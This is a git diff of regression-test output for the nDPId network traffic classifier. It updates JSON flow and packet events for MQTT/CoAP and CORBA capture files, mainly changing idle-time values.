+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271483,"flow_last_seen":1455907271483,"flow_idle_time":7560000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1455907271483,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1455907271483,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":1455907271483,"pkt":"CAAnAERyCAAnmO\/hCABFAAB+1KdAAEAGdBvAqDhlwKg4AURd0RSW3pIhxZi6gFAYAOXyJwAAMlQACEJ1czE3Q21kAAJ7Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjExIEVFVCAyMDE2In0="} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271483,"flow_last_seen":1455907271483,"flow_idle_time":7560000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1455907271483,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1455907271483,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":61,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":61,"pkt_l4_len":27,"thread_ts_msec":1455907271483,"pkt":"CAAnAERyCAAnmO\/hCABFAAAvXYVAAEAR64HAqDhlwKg4AURcxIcAG\/HjY0Q1AW9STYsvci9CdXMxN0NtZA=="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1455907271485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1455907271485,"pkt":"CAAnmO\/hCAAnAERyCABFAAAsEMdAAIAG+E3AqDgBwKg4ZdEURF3FmLqAlt6Sd1AYAP++LAAAQAIAAgAA"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1455907271522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1455907271522,"pkt":"CAAnAERyCAAnmO\/hCABFAAAo1KhAAEAGdHDAqDhlwKg4AURd0RSW3pJ3xZi6hFAQAOXx0QAA"} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1455907271485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1455907271485,"pkt":"CAAnmO\/hCAAnAERyCABFAAAsEMdAAIAG+E3AqDgBwKg4ZdEURF3FmLqAlt6Sd1AYAP++LAAAQAIAAgAA"} 
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1455907271522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1455907271522,"pkt":"CAAnAERyCAAnmO\/hCABFAAAo1KhAAEAGdHDAqDhlwKg4AURd0RSW3pJ3xZi6hFAQAOXx0QAA"} 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1455907271585,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"thread_ts_msec":1455907271585,"pkt":"CAAnmO\/hCAAnAERyCABFAAB7EM0AAIARN+7AqDgBwKg4ZcSHRFwAZzJrQgM1Anj4ckRcQXIIQnVzMTdDbWQRMv97Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjExIEVFVCAyMDE2In0="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907272856,"flow_last_seen":1455907272856,"flow_idle_time":180000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1455907272856,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1455907272856,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"thread_ts_msec":1455907272856,"pkt":"CAAnmO\/hCAAnAERyCABFAAB7EWkAAIARN1LAqDgBwKg4ZcSORFwAZ7scQgMdqQeYckRcQXIIQnVzMTdDbWQRMv97Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjEyIEVFVCAyMDE2In0="} 
@@ -84,10 +84,10 @@ 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907274088,"flow_last_seen":1455907285181,"flow_idle_time":180000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11794,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907272856,"flow_last_seen":1455907284046,"flow_idle_time":180000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11820,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907275690,"flow_last_seen":1455907286608,"flow_idle_time":180000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11742,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1922,"flow_first_seen":1455907243976,"flow_last_seen":1455907286855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":32,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 
-00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1926,"flow_first_seen":1455907258332,"flow_last_seen":1455907286855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} -00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1919,"flow_first_seen":1455907271483,"flow_last_seen":1455907286855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":32,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 
-00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1928,"flow_first_seen":1455907267002,"flow_last_seen":1455907286845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61855,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1922,"flow_first_seen":1455907243976,"flow_last_seen":1455907286855,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":32,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 
+00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1926,"flow_first_seen":1455907258332,"flow_last_seen":1455907286855,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1919,"flow_first_seen":1455907271483,"flow_last_seen":1455907286855,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":32,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 
+00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1928,"flow_first_seen":1455907267002,"flow_last_seen":1455907286845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61855,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","packets-captured":8516,"packets-processed":8514,"total-skipped-flows":0,"total-l4-data-len":294179,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":16,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":16,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":91,"global_ts_msec":1455907286855} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 8516/8514 diff --git a/test/results/corba.pcap.out b/test/results/corba.pcap.out index 255ac12a8..bec1da37b 100644 --- a/test/results/corba.pcap.out +++ b/test/results/corba.pcap.out 
@@ -1,23 +1,23 @@ 00456{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"corba.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"corba.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1614768020788} -00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614768020789,"flow_last_seen":1614768020789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614768020789,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614768020789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020789,"pkt":"5kBKB+riApXG95NLCABFAAAwnOsAAIAGAAAKZQACCmYAAiIWA4SwjQfnAAAAAHACgAEU8QAAAgQFtAMDAQA="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614768020790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020790,"pkt":"ApXG95NL5kBKB+riCABFAAAwnN4AAH8GihsKZgACCmUAAgOEIhawjRxgsI0H6HASgAFEQgAAAgQFtAMDAQA="} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614768020790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614768020790,"pkt":"5kBKB+riApXG95NLCABFAAAonOwAAIAGAAAKZQACCmYAAiIWA4SwjQfosI0cYVAQgAEU6QAAAAAAAAAA"} -00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020789,"flow_last_seen":1614768020790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1614768020790,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614768020792,"flow_last_seen":1614768020792,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614768020792,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614768020792,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020792,"pkt":"5kBKB+riApXG95NLCABFAAAwnO8AAIAGAAAKZQACCmYAAiIXBBmwjThoAAAAAHACgAEU8QAAAgQFtAMDAQA="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614768020793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020793,"pkt":"ApXG95NL5kBKB+riCABFAAAwnOEAAH8GihgKZgACCmUAAgQZIhewjUFJsI04aXASgAHuQQAAAgQFtAMDAQA="} 
-00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614768020793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614768020793,"pkt":"5kBKB+riApXG95NLCABFAAAonPAAAIAGAAAKZQACCmYAAiIXBBmwjThpsI1BSlAQgAEU6QAAAAAAAAAA"} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020792,"flow_last_seen":1614768020793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1614768020793,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} -00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614768020794,"flow_last_seen":1614768020794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614768020794,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614768020794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020794,"pkt":"5kBKB+riApXG95NLCABFAAAwnPQAAIAGAAAKZQACCmYAAiIY7wewjV4NAAAAAHACgAEU8QAAAgQFtAMDAQA="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614768020795,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020795,"pkt":"ApXG95NL5kBKB+riCABFAAAwnOUAAH8GihQKZgACCmUAAu8HIhiwjWV0sI1eDnASgAG5gQAAAgQFtAMDAQA="} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614768020795,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614768020795,"pkt":"5kBKB+riApXG95NLCABFAAAonPUAAIAGAAAKZQACCmYAAiIY7wewjV4OsI1ldVAQgAEU6QAAAAAAAAAA"} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020794,"flow_last_seen":1614768020795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":322,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} -00668{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1614768020789,"flow_last_seen":1614768020792,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} -00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1614768020792,"flow_last_seen":1614768020794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":1047,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} 
-00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1614768020794,"flow_last_seen":1614768020795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":322,"flow_tot_l4_payload_len":588,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} 